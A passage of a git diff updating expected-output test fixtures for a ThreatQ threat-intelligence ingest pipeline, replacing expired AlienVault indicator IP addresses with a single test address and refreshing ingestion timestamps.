00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"418a88a2a1bac6980a7d83e6b2b2a27d","id":347,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":347,"indicator_id":347,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} \ No newline at end of file diff --git a/packages/ti_threatq/data_stream/threat/_dev/test/pipeline/test-threatq-sample-ndjson.log-expected.json b/packages/ti_threatq/data_stream/threat/_dev/test/pipeline/test-threatq-sample-ndjson.log-expected.json index 827cad3136e..ba36aab6f74 100644 --- a/packages/ti_threatq/data_stream/threat/_dev/test/pipeline/test-threatq-sample-ndjson.log-expected.json +++ b/packages/ti_threatq/data_stream/threat/_dev/test/pipeline/test-threatq-sample-ndjson.log-expected.json 
@@ -29,19 +29,19 @@ }, "expires_calculated_at": "2020-10-15T14:40:03.000Z", "published_at": "2020-09-11T14:35:51.000Z", - "indicator_value": "69.44.202.220", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { "indicator": { "type": "ipv4-addr", "confidence": "Low", - "ip": "69.44.202.220" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368798314Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1877,\"indicator_id\":336,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1878,\"indicator_id\":336,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"MP\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1879,\"indicator_id\":336,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Saipan\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1880,\"indicator_id\":336,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1881,\"indicator_id\":336,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1882,\"indicator_id\":336,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"1ece659dcec98b1e1141160b55655c96\",\"id\":336,\"published_at\":\"2020-09-11 
14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":336,\"indicator_id\":336,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"69.44.202.220\"}", + "ingested": "2021-12-09T13:49:13.119392Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1877,\"indicator_id\":336,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1878,\"indicator_id\":336,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"MP\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1879,\"indicator_id\":336,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Saipan\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1880,\"indicator_id\":336,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1881,\"indicator_id\":336,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 
14:35:53\",\"id\":1882,\"indicator_id\":336,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"1ece659dcec98b1e1141160b55655c96\",\"id\":336,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":336,\"indicator_id\":336,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -79,19 +79,19 @@ }, "expires_calculated_at": "2020-10-15T14:40:03.000Z", "published_at": "2020-09-11T14:35:51.000Z", - "indicator_value": "69.94.155.176", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { "indicator": { "type": "ipv4-addr", "confidence": "Low", - "ip": "69.94.155.176" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368829212Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1883,\"indicator_id\":337,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1884,\"indicator_id\":337,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1885,\"indicator_id\":337,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1886,\"indicator_id\":337,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1887,\"indicator_id\":337,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1888,\"indicator_id\":337,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Sacramento\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 
14:40:03\",\"hash\":\"73c98d43519990c841a5d022546fedd4\",\"id\":337,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":337,\"indicator_id\":337,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"69.94.155.176\"}", + "ingested": "2021-12-09T13:49:13.119397500Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1883,\"indicator_id\":337,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1884,\"indicator_id\":337,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1885,\"indicator_id\":337,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1886,\"indicator_id\":337,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1887,\"indicator_id\":337,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 
14:36:00\",\"value\":\"4\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1888,\"indicator_id\":337,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Sacramento\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"73c98d43519990c841a5d022546fedd4\",\"id\":337,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":337,\"indicator_id\":337,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -129,19 +129,19 @@ }, "expires_calculated_at": "2020-10-15T14:40:03.000Z", "published_at": "2020-09-11T14:35:51.000Z", - "indicator_value": "69.42.81.68", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { "indicator": { "type": "ipv4-addr", "confidence": "Low", - "ip": "69.42.81.68" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368836225Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1889,\"indicator_id\":338,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1890,\"indicator_id\":338,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1891,\"indicator_id\":338,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1892,\"indicator_id\":338,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1893,\"indicator_id\":338,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"New York\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1894,\"indicator_id\":338,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"a9c6773919112627495d87c51fe89b15\",\"id\":338,\"published_at\":\"2020-09-11 
14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":338,\"indicator_id\":338,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"69.42.81.68\"}", + "ingested": "2021-12-09T13:49:13.119404400Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1889,\"indicator_id\":338,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1890,\"indicator_id\":338,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1891,\"indicator_id\":338,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1892,\"indicator_id\":338,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1893,\"indicator_id\":338,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"New York\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 
14:35:53\",\"id\":1894,\"indicator_id\":338,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"a9c6773919112627495d87c51fe89b15\",\"id\":338,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":338,\"indicator_id\":338,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -173,19 +173,19 @@ }, "expires_calculated_at": "2020-10-15T14:40:02.000Z", "published_at": "2020-09-11T14:35:41.000Z", - "indicator_value": "37.17.250.101", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { "indicator": { "type": "ipv4-addr", "confidence": "Low", - "ip": "37.17.250.101" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368842246Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:43\",\"id\":184,\"indicator_id\":34,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:35:49\",\"updated_at\":\"2020-10-15 14:35:49\",\"value\":\"4\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:43\",\"id\":185,\"indicator_id\":34,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:35:49\",\"updated_at\":\"2020-10-15 14:35:49\",\"value\":\"3\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:43\",\"id\":186,\"indicator_id\":34,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:35:49\",\"updated_at\":\"2020-10-15 14:35:49\",\"value\":\"Malicious Host\"},{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:43\",\"id\":187,\"indicator_id\":34,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:35:49\",\"updated_at\":\"2020-10-15 14:35:49\",\"value\":\"2\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:41\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:02\",\"hash\":\"56f3cb07a9055f52947bb4c4244f762d\",\"id\":34,\"published_at\":\"2020-09-11 14:35:41\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:43\",\"creator_source_id\":12,\"id\":34,\"indicator_id\":34,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:43\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 
14:35:49\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"37.17.250.101\"}", + "ingested": "2021-12-09T13:49:13.119414900Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:43\",\"id\":184,\"indicator_id\":34,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:35:49\",\"updated_at\":\"2020-10-15 14:35:49\",\"value\":\"4\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:43\",\"id\":185,\"indicator_id\":34,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:35:49\",\"updated_at\":\"2020-10-15 14:35:49\",\"value\":\"3\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:43\",\"id\":186,\"indicator_id\":34,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:35:49\",\"updated_at\":\"2020-10-15 14:35:49\",\"value\":\"Malicious Host\"},{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:43\",\"id\":187,\"indicator_id\":34,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:35:49\",\"updated_at\":\"2020-10-15 14:35:49\",\"value\":\"2\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:41\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:02\",\"hash\":\"56f3cb07a9055f52947bb4c4244f762d\",\"id\":34,\"published_at\":\"2020-09-11 14:35:41\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:43\",\"creator_source_id\":12,\"id\":34,\"indicator_id\":34,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:43\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:35:49\"}],\"status\":{\"description\":\"No longer poses a 
serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -223,19 +223,19 @@ }, "expires_calculated_at": "2020-10-15T14:40:03.000Z", "published_at": "2020-09-11T14:35:51.000Z", - "indicator_value": "69.94.129.203", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { "indicator": { "type": "ipv4-addr", "confidence": "Low", - "ip": "69.94.129.203" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368847456Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1901,\"indicator_id\":340,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1902,\"indicator_id\":340,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1903,\"indicator_id\":340,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1904,\"indicator_id\":340,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1905,\"indicator_id\":340,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1906,\"indicator_id\":340,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Sacramento\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 
14:40:03\",\"hash\":\"97624a37200db6ba0bcfce8c9c28f527\",\"id\":340,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":340,\"indicator_id\":340,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"69.94.129.203\"}", + "ingested": "2021-12-09T13:49:13.119512900Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1901,\"indicator_id\":340,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1902,\"indicator_id\":340,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1903,\"indicator_id\":340,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1904,\"indicator_id\":340,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1905,\"indicator_id\":340,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 
14:36:00\",\"value\":\"4\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1906,\"indicator_id\":340,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Sacramento\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"97624a37200db6ba0bcfce8c9c28f527\",\"id\":340,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":340,\"indicator_id\":340,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -273,7 +273,7 @@ }, "expires_calculated_at": "2020-10-15T14:40:03.000Z", "published_at": "2020-09-11T14:35:51.000Z", - "indicator_value": "69.216.117.22", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { 
